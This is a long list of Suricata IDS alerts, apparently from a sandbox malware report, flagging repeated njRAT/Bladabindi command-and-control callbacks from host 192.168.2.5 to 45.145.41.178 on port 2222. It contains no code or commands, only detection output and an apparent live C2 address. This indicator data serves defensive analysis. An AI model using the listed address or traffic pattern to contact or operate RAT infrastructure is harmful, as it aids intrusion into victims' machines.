Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54059 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54059 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54054 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54054 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54077 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54077 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54068 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54068 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54082 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54082 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54083 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54083 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54084 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54084 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54044 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54044 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54044 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54087 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54087 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54088 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54082 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54088 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54089 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54089 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54090 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54091 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54091 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54092 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54091 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54092 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54090 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54093 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54094 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54093 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54094 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54076 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54076 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54046 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54046 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54046 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54099 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54099 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54083 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54094 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54087 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54056 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54056 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54056 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54084 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54104 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54104 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54101 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54089 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54101 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54097 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54106 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54106 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54097 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54092 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54107 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54107 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54108 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54104 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54095 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54108 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54109 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54108 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54095 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54109 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54095 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54088 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54076 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54093 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54106 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54086 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54086 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54086 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54097 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54111 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54081 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54101 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54100 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54100 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54080 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54111 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54100 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54114 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54114 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54081 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54080 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54105 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54116 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54105 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54111 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54116 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54102 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54102 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54102 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54120 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54120 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54115 -> 45.145.41.178:2222
